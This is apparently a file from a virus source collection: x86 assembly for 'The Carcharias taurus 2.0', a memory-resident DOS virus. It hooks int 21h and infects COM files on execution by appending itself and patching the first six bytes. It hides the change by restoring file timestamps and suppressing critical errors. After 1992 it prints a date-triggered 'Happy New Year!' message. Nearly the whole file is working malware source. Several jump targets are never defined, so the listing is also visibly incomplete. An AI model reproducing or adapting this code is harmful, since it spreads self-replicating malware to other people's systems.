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synced 2025-02-26 00:14:43 +00:00
378 lines
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378 lines
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TITLE The Carcharias taurus 2.0
; Some Constants -------------------------------------------------------------
DogSize equ 584-16-6
; ----------------------------------------------------------------------------
db 0E9h ; JMP Loader
dw 3
db 0
dw 0256h
; ************************** DOG LOADER **************************************
call GetBP ; Get BP
GetBP: pop BP
sub BP, 103h
push AX ; Save AX
; Find Z-MCB -----------------------------------------------------------------
mov AH, 52h
int 21h
mov DX, ES:[BX-2]
mov DI, (OFFSET Place)-6
mov DS:[BP+DI], DX
mov DI, (OFFSET Place)-6
mov ES, DS:[BP+DI]
mov DX, ES:[3] ; Calc the next MCB seg
inc DX
add DS:[BP+DI], DX
cmp ES:[0], byte ptr 'Z'
jne NEXT0
; ----------------------------------------------------------------------------
; Looking for the Dog behind Z-MCB -------------------------------------------
push ES
mov DX, ES
add DX, ES:[3]
inc DX
mov ES, DX
mov DX, ES:[3]
pop ES
cmp DX, 815Dh ; 815Dh - Dog's bytes
je LExit
; ----------------------------------------------------------------------------
; Eat 1K in the Z-MCB, Current PSP, BIOS Data --------------------------------
push DS
sub ES:[3], word ptr 40h ; Dec Z-MCB
mov AH, 62h
int 21h
mov DS, BX
sub DS:[2], word ptr 40h ; Dec Curr PSP
xor DX, DX
mov DS, DX
dec word ptr DS:[413h]
pop DS
; ----------------------------------------------------------------------------
; Calculate Dog's segment adress ---------------------------------------------
mov DX, CS
add DX, ES:[3]
mov ES, DX
; ----------------------------------------------------------------------------
; Now load the Dog -----------------------------------------------------------
xor DI, DI
mov SI, BP
add SI, 100h
mov CX, DogSize
rep movsb
; ----------------------------------------------------------------------------
; Hook 21h -------------------------------------------------------------------
; Get old vector
push ES
mov AX, 3521h
int 21h
mov DX, ES
pop ES
mov DI, (OFFSET Exit21h)-100h-6+1
mov ES:[DI], BX
inc DI
inc DI
mov ES:[DI], DX
; Set 21h to Dog
mov AX, 2521h
mov DX, (OFFSET Dog)-100h-6
push DS
push ES
pop DS
int 21h
pop DS
; ----------------------------------------------------------------------------
; Loader Exit ----------------------------------------------------------------
; Restore first 6 bytes
mov DI, (OFFSET M_6Bytes)-6
mov AX, word ptr DS:[BP+DI]
inc DI
inc DI
mov BX, word ptr DS:[BP+DI]
inc DI
inc DI
mov CX, word ptr DS:[BP+DI]
mov word ptr CS:[100h], AX
mov word ptr CS:[102h], BX
mov word ptr CS:[104h], CX
; Restore all registers
pop AX
xor BX, BX
xor CX, CX
xor DI, DI
xor SI, SI
xor BP, BP
mov DX, 100h
push DX
xor DX, DX
push DS
pop ES
; ----------------------------------------------------------------------------
; ************************** END of DOG LOADER *******************************
; ******************************* DOG **************************************
cmp AX, 4B00h
je D01
jmp QuickExit
D01: push AX
push BX
push CX
push DX
push DI
push SI
push DS
push ES
push DX ; Store file name
push DS
; Effect ? -------------------------------------------------------------------
mov AH, 2Ah
int 21h
cmp CX, 1993 ; After 1992
jb EExit
cmp DH, 1 ; Jan,
jne EExit
mov AH, 2Ch
int 21h
cmp CH, 14
jne EExit
cmp CL, 30
jb EExit
; yes!
push CS
pop DS
mov CX, 20
mov AH, 2
mov SI, (OFFSET Tired)-100h-6
CHN: mov DL, byte ptr DS:[SI]
inc SI
dec DL
int 21h
loop CHN
; cli
; hlt
; ----------------------------------------------------------------------------
; Store old int 24h vector ---------------------------------------------------
mov AX, 3524h ; Get intrpt vector (ES:BX)
int 21h
mov DI, (OFFSET Old24h)-100h-6
mov CS:[DI], BX ; Store BX
inc DI
inc DI
mov CS:[DI], ES ; Store ES
; ----------------------------------------------------------------------------
; Set new int 24h handler ----------------------------------------------------
mov AX, 2524h ; Set intrpt vector (DS:DX)
mov DX, (OFFSET INT24)-100h-6
push CS
pop DS
int 21h
; ----------------------------------------------------------------------------
; -----------------------------------------------------
pop DS
pop DX
; ----------------------------------------------------------------------------
; Open the file --------------------------------------------------------------
mov AX, 3D02h
int 21h
mov DI, (OFFSET Handle)-100h-6
mov CS:[DI], AX
jnc D02
jmp DExit
; ----------------------------------------------------------------------------
; Read 1st 6 bytes -----------------------------------------------------------
push CS
pop DS
mov AH, 3Fh
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
mov DX, (OFFSET M_6Bytes)-100h-6
mov CX, 6
int 21h
jnc D03
jmp DExit
; ----------------------------------------------------------------------------
; Check File Format ----------------------------------------------------------
mov DI, (OFFSET M_6Bytes)-100h-6
cmp CS:[DI], 4D5Ah
jne D04
jmp DExit
D04: cmp CS:[DI], 5A4Dh
je DExit
; ----------------------------------------------------------------------------
; Check File for Dog ---------------------------------------------------------
cmp CS:[DI+3], 0256h
je DExit
; ----------------------------------------------------------------------------
; Get and Store file Date&Time -----------------------------------------------
mov AX, 5700h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
int 21h
mov DI, (OFFSET FDate)-100h-6
mov CS:[DI], DX
inc DI
inc DI
mov CS:[DI], CX
; ----------------------------------------------------------------------------
; Get and Store file Size ----------------------------------------------------
mov AX, 4202h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
xor DX, DX
xor CX, CX
int 21h
mov DI, (OFFSET FSize)-100h-6
sub AX, 3
mov CS:[DI], AX
cmp AX, 64512
ja DExit
cmp AX, 6
jb DExit
; ----------------------------------------------------------------------------
; Add Dog to the file --------------------------------------------------------
push CS
pop DS
mov AH, 40h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
mov CX, DogSize
xor DX, DX
int 21h
; ----------------------------------------------------------------------------
; Write 1st 6 bytes to file --------------------------------------------------
; Move file ptr to the start
mov AX, 4200h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
xor DX, DX
xor CX, CX
int 21h
; Write ...
mov AH, 40h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
mov CX, 6
mov DX, (OFFSET DogCall)-100h-6
int 21h
; ----------------------------------------------------------------------------
; Set file Date&Time ---------------------------------------------------------
mov AX, 5701h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
mov DI, (OFFSET FDate)-100h-6
mov DX, CS:[DI]
inc DI
inc DI
mov CX, CS:[DI]
int 21h
; ----------------------------------------------------------------------------
; Close the file -------------------------------------------------------------
mov AH, 3Eh
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
int 21h
; ----------------------------------------------------------------------------
; Restore int 24h ------------------------------------------------------------
mov AX, 2524h ; Set intrpt vector (DS:DX)
mov DI, (OFFSET Old24h)-100h-6
mov DX, CS:[DI]
inc DI
inc DI
mov DS, CS:[DI]
int 21h
; ----------------------------------------------------------------------------
pop ES
pop DS
pop SI
pop DI
pop DX
pop CX
pop BX
pop AX
QuickExit: popf
Exit21h: db 0EAh
Int21hIP: dw 0 ; BX
Int21hCS: dw 0 ; ES
; Int 24h handler ------------------------------------------------------------
INT24: xor al, al ; Ignore critical error
; ----------------------------------------------------------------------------
; **************************** END of DOG **********************************
M_6Bytes db 90h, 90h, 90h, 90h, 90h, 0C3h
Tired db 11, 11, 'Ibqqz!Ofx!Zfbs!"', 14, 11
DogCall db 0E9h
FSize dw 0606h
Sign db 'V', 2
Handle dw 0606h
Vers dw 0606h
FDate dw 0606h, 0606h ; Date, Time
Old24h dw 0606h, 0606h ; BX:ES
Attrib dw 0606h
Place dw 0606h